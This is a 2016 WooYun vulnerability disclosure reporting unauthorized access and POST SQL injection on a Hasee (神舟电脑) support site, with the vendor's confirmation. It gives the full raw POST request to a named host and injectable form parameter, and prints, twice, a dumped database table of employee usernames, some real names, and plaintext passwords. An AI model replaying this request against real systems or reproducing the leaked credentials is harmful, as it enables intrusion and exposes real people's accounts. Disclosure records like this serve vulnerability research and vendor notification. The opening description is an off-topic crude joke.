当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167309

漏洞标题:神舟电脑某处未授权访问+post注入

相关厂商:深圳市神舟电脑股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-05 11:23

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-05: 细节已通知厂商并且等待厂商处理中
2016-01-05: 厂商已经确认,细节仅向厂商公开
2016-01-15: 细节向核心白帽子及相关领域专家公开
2016-01-25: 细节向普通白帽子公开
2016-02-04: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

早上,学校食堂排队吃早餐…
我前面一女孩对卖早餐大叔说:我要一根油条,一个蛋,不要奶了,我自己带奶了…
后面一阵爆笑…
我阴阳怪气地对大叔说:我要奶和油条,蛋就不要了,我自己带了俩蛋…

详细说明:

0x01

1.jpg


0x02

POST /lookup/bios/bios_a.asp HTTP/1.1
Host: kfgl.hasee.com
Proxy-Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kfgl.hasee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Referer: http://kfgl.hasee.com/lookup/bios/bios_a.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDQCQTCSQD=JKNFCKLAFMCAAFOFIGHGIBBC; ASPSESSIONIDQCSRCSQC=DGFNEHCBDAHPJMDCBPDLADKN; count=4
barebone=123456&select=barebone&Submit=%CB%D1%CB%F7

2.jpg

+-----+-----------+------------+
| id  | username  | password   |
+-----+-----------+------------+
| 112 | zhouxiang | 123456     |
| 119 | tangce    | 123456     |
| 131 | liuke     | 123456     |
| 140 | 刘科        | 1984112818 |
| 163 | liyd      | 123456     |
| 178 | 李亚东       | 123456     |
| 180 | guhm      | 123456     |
| 181 | 顾海妹       | 123456     |
| 182 | luoxw     | 123456     |
| 187 | yangyu    | 123456     |
| 188 | suqh      | 123456     |
| 190 | ludl      | 123456     |
| 192 | yanghui   | 123456     |
| 196 | huangbin  | 123456     |
| 197 | 杨旦        | 123456     |
| 204 | yuanjf    | 123456     |
| 205 | lilei     | 123456     |
| 210 | zhaozd    | 123456     |
| 211 | lill      | 123456     |
| 212 | lijz      | 123456     |
| 213 | 毛兰英       | 123456     |
| 214 | maoly     | 123456     |
| 216 | longdt    | 123456     |
| 217 | zhangtf   | 123456     |
| 218 | 原金凤       | 123456     |
| 220 | huxl      | 123456     |
| 222 | wangxy    | 123456     |
| 223 | yanyun    | 123456     |
| 224 | panly     | 123456     |
| 225 | huay      | 123456     |
| 226 | longyl    | 123456     |
| 227 | baiqh     | 123456     |
| 228 | xiahm     | 123456     |
| 229 | chenzb    | 123456     |
| 230 | xumh      | 123456     |
| 231 | huaying   | 123456     |
| 234 | qicy      | 123456     |
| 235 | 严云        | 123456     |
| 236 | yufl      | 123456     |
| 237 | yangqx    | 123456     |
| 238 | qinhuan   | 123456     |
| 239 | lifl      | 123456     |
| 240 | tuyf      | 123456     |
| 241 | yanyu     | 123456     |
| 242 | wuxh      | 123456     |
| 243 | wangfl    | 123456     |
| 244 | gaohm     | 123456     |
| 245 | yaoxiang  | 123456     |
| 246 | lukp      | 123456     |
| 247 | raoshu    | 123456     |
| 248 | zhangxw   | 123456     |
| 249 | caiyf     | 123456     |
| 86  | xiaoqi    | 123456     |
| 90  | yangdan   | 123456     |
+-----+-----------+------------+

漏洞证明:

0x01

1.jpg


0x02

POST /lookup/bios/bios_a.asp HTTP/1.1
Host: kfgl.hasee.com
Proxy-Connection: keep-alive
Content-Length: 51
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://kfgl.hasee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
Content-Type: application/x-www-form-urlencoded
Referer: http://kfgl.hasee.com/lookup/bios/bios_a.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDQCQTCSQD=JKNFCKLAFMCAAFOFIGHGIBBC; ASPSESSIONIDQCSRCSQC=DGFNEHCBDAHPJMDCBPDLADKN; count=4
barebone=123456&select=barebone&Submit=%CB%D1%CB%F7

2.jpg

+-----+-----------+------------+
| id  | username  | password   |
+-----+-----------+------------+
| 112 | zhouxiang | 123456     |
| 119 | tangce    | 123456     |
| 131 | liuke     | 123456     |
| 140 | 刘科        | 1984112818 |
| 163 | liyd      | 123456     |
| 178 | 李亚东       | 123456     |
| 180 | guhm      | 123456     |
| 181 | 顾海妹       | 123456     |
| 182 | luoxw     | 123456     |
| 187 | yangyu    | 123456     |
| 188 | suqh      | 123456     |
| 190 | ludl      | 123456     |
| 192 | yanghui   | 123456     |
| 196 | huangbin  | 123456     |
| 197 | 杨旦        | 123456     |
| 204 | yuanjf    | 123456     |
| 205 | lilei     | 123456     |
| 210 | zhaozd    | 123456     |
| 211 | lill      | 123456     |
| 212 | lijz      | 123456     |
| 213 | 毛兰英       | 123456     |
| 214 | maoly     | 123456     |
| 216 | longdt    | 123456     |
| 217 | zhangtf   | 123456     |
| 218 | 原金凤       | 123456     |
| 220 | huxl      | 123456     |
| 222 | wangxy    | 123456     |
| 223 | yanyun    | 123456     |
| 224 | panly     | 123456     |
| 225 | huay      | 123456     |
| 226 | longyl    | 123456     |
| 227 | baiqh     | 123456     |
| 228 | xiahm     | 123456     |
| 229 | chenzb    | 123456     |
| 230 | xumh      | 123456     |
| 231 | huaying   | 123456     |
| 234 | qicy      | 123456     |
| 235 | 严云        | 123456     |
| 236 | yufl      | 123456     |
| 237 | yangqx    | 123456     |
| 238 | qinhuan   | 123456     |
| 239 | lifl      | 123456     |
| 240 | tuyf      | 123456     |
| 241 | yanyu     | 123456     |
| 242 | wuxh      | 123456     |
| 243 | wangfl    | 123456     |
| 244 | gaohm     | 123456     |
| 245 | yaoxiang  | 123456     |
| 246 | lukp      | 123456     |
| 247 | raoshu    | 123456     |
| 248 | zhangxw   | 123456     |
| 249 | caiyf     | 123456     |
| 86  | xiaoqi    | 123456     |
| 90  | yangdan   | 123456     |
+-----+-----------+------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-05 15:36

厂商回复:

多谢你找出漏洞

最新状态:

暂无